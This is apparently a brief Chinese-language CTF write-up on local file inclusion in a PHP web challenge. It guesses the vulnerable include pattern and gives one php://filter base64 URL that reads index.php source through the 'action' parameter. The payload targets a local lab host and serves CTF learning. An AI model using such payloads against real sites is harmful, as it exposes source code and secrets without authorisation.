您的位置:首页 > 其它

CTF web题总结--LFI

2017-08-30 20:18 218 查看
本地文件包含漏洞(Local File Include),是php的include()函数存在设计缺陷,学习链接:php文件包含漏洞总结

题目的url都是类似这种:

http://127.0.0.1/web500/index.php?action=front&mode=index http://127.0.0.1/web500/index.php?action=front&mode=newnote http://127.0.0.1/web500/index.php?action=front&mode=delete


猜想后台代码可能是这样:

include $action.'/'.$mode.'.php'


于是利用文件包含获取index.php源码:

http://127.0.0.1/web500/index.php?action=php://filter/read=convert.base64‐encode/resource=./&mode=index
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: